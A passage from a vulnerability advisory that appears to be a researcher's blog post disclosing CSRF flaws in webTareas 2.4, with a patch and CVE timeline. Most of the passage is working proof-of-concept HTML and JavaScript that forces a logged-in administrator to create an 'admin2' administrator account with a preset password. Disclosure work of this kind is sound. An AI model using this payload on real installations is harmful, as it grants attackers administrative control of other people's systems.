<input type="hidden" name="vals[19]" value="Y" />
<input type="hidden" name="vals[22]" value="Y" />
<input type="hidden" name="vals[23]" value="Y" />
<input type="hidden" name="vals[25]" value="Y" />
<input type="hidden" name="vals[27]" value="Y" />
<input type="hidden" name="vals[30]" value="Y" />
<input type="hidden" name="vals[31]" value="Y" />
<input type="hidden" name="vals[34]" value="Y" />
<input type="hidden" name="vals[36]" value="Y" />
<input type="hidden" name="vals[37]" value="Y" />
<input type="hidden" name="vals[40]" value="Y" />
<input type="hidden" name="vals[41]" value="Y" />
<input type="hidden" name="vals[43]" value="Y" />
<input type="hidden" name="vals[46]" value="Y" />
<input type="hidden" name="vals[47]" value="Y" />
<input type="hidden" name="vals[50]" value="Y" />
<input type="hidden" name="vals[51]" value="Y" />
<input type="hidden" name="vals[54]" value="Y" />
<input type="hidden" name="vals[55]" value="Y" />
<input type="hidden" name="vals[56]" value="Y" />
<input type="hidden" name="vals[59]" value="Y" />
<input type="hidden" name="vals[60]" value="Y" />
<input type="hidden" name="vals[62]" value="Y" />
<input type="hidden" name="vals[64]" value="Y" />
<input type="hidden" name="vals[66]" value="Y" />
<input type="hidden" name="vals[68]" value="Y" />
<input type="hidden" name="vals[69]" value="Y" />
<input type="hidden" name="vals[71]" value="Y" />
<input type="hidden" name="vals[73]" value="Y" />
<input type="hidden" name="vals[75]" value="Y" />
<input type="hidden" name="vals[77]" value="Y" />
<input type="hidden" name="vals[80]" value="Y" />
<input type="hidden" name="vals[81]" value="Y" />
<input type="hidden" name="vals[84]" value="Y" />
<input type="hidden" name="vals[85]" value="Y" />
<input type="hidden" name="vals[88]" value="Y" />
<input type="hidden" name="vals[89]" value="Y" />
<input type="hidden" name="vals[90]" value="Y" />
<input type="hidden" name="vals[91]" value="Y" />
<input type="hidden" name="vals[92]" value="Y" />
<input type="hidden" name="Save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Enable the local web server on the attacker machine:
sudo /etc/init.d/apache2 start
From an authenticated browser session with administrative privileges, open a new tab and go to the page http://127.0.0.1/csrf.html.
Select Submit request, to force the administrator to create a new administrator profile named admin2.
The request will be sent to the web application correctly:
In the same way, the attacker will send another HTML page requesting the administrator to create a new user, but this time with the new admin2 profile:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/www.webtareas.net\/users\/edituser.php?", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;boundary=---------------------------344591365341958811843854665485");
xhr.withCredentials = true;
var body = "-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"add\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"un\"\r\n" +
"\r\n" +
"admin2\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"fn\"\r\n" +
"\r\n" +
"admin2\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"gender\"\r\n" +
"\r\n" +
"F\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"perm\"\r\n" +
"\r\n" +
"8\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"dep\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"tit\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"em\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"em1\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"wp\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"hp\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"mp\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"fax\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"supr\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"agent\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"loc\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"la\"\r\n" +
"\r\n" +
"en\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"dtft\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"tmft\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"wc\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"bftI\"\r\n" +
"\r\n" +
"2021-09-28\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"ifb\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"c\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"file1\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"attnam1\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"atttmp1\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"act\"\r\n" +
"\r\n" +
"X\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"pw\"\r\n" +
"\r\n" +
"Password1\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"pwa\"\r\n" +
"\r\n" +
"Password1\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"cn\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"pass1\"\r\n" +
"\r\n" +
"Y\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"pass2\"\r\n" +
"\r\n" +
"Y\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt0\"\r\n" +
"\r\n" +
"Type new password\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt1\"\r\n" +
"\r\n" +
"Need more characters\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt2\"\r\n" +
"\r\n" +
"Strength weak\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt3\"\r\n" +
"\r\n" +
"Strength medium\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt4\"\r\n" +
"\r\n" +
"Strength strong\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"txt5\"\r\n" +
"\r\n" +
"Two new passwords did not match\r\n" +
"-----------------------------344591365341958811843854665485\r\n" +
"Content-Disposition: form-data; name=\"Save\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------344591365341958811843854665485--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Select Submit request, to force the administrator to create a new administrator user named admin2 with a pre-chosen password.
The request will be sent to the web application correctly:
Security Impact
By exploiting this issue, a remote attacker is able to add an administrator user profile and user account on behalf of a regular platform administrator.
Timeline
- 29/09/2021: First disclosure via SourceForge ticket, in private mode. Same day the owner take charge of it.
- 01/10/2021: First patch release (2.4p1), and the advisory is published on this blog page.
- 02/10/2021: I checked the same issues and suggested few improvements, IMHO.
- 07/10/2021: Second patch release (2.4p2), and the advisory is published on this blog page.
- 08/10/2021: Published CVEs on MITRE.
- 15/10/2021: NVD scored CVE-2021-41916 and CVE-2021-41919 as 8.8 (High), CVE-2021-41920 as 7.5 (High), CVE-2021-41917 and CVE-2021-41918 as 5.4 (Medium).